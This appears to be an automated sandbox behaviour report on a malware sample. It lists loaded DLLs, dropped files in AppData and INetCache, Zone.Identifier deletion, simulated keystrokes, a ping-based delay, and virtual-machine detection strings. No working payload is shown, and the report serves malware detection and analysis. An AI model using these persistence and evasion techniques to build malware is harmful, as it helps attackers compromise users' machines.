        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: dui70.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: duser.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: thumbcache.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: policymanager.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: dataexchange.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: d3d11.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: dcomp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: windows.ui.fileexplorer.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: assignedaccessruntime.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: windows.fileexplorer.common.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: structuredquery.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: atlthunk.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: windows.storage.search.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: iconcodecservice.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: twinapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: actxprxy.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiSection loaded: networkexplorer.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\ssjhrjiWindow detected: Number of UI elements: 13
        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00735FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00735FC8
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00780315 push cs; retn 0077h10_2_00780318
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00750DE6 push ecx; ret 10_2_00750DF9
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_004032AC push eax; ret 16_2_004032C2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00780315 push cs; retn 0077h16_2_00780318
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00750DE6 push ecx; ret 16_2_00750DF9
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0074D145 push esp; retf 0003h16_2_0074D146
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF0DE6 push ecx; ret 19_2_00AF0DF9
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AED145 push esp; retf 0003h19_2_00AED146

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ssjhrjiJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ssjhrjiJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ssjhrji:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007C26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_007C26DD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0074FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0074FC7C
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007C26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_007C26DD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0074FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_0074FC7C
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_00B626DD
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AEFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00AEFC7C
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\ssjhrjiProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: Existence.pif, 00000010.00000002.2288276292.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 466Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 471Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifAPI coverage: 4.8 %
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifAPI coverage: 0.3 %
        Source: C:\Users\user\AppData\Roaming\ssjhrjiAPI coverage: 1.2 %
        Source: C:\Windows\explorer.exe TID: 4080Thread sleep count: 341 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 2128Thread sleep count: 132 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 1800Thread sleep count: 76 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079DC54
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0076C622 FindFirstFileExW,10_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,10_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A7333 FindFirstFileW,FindClose,10_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0076C622 FindFirstFileExW,16_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,16_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A7333 FindFirstFileW,FindClose,16_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079DC54
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A087
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A1E2
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00B3E472
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00B4A570
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B466DC FindFirstFileW,FindNextFileW,FindClose,19_2_00B466DC
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00B473D4
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B47333 FindFirstFileW,FindClose,19_2_00B47333
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3D921
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3DC54
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00735FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00735FC8
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: ssjhrji, 00000013.00000002.2864843617.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
        Source: explorer.exe, 00000011.00000002.2870173011.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
        Source: explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
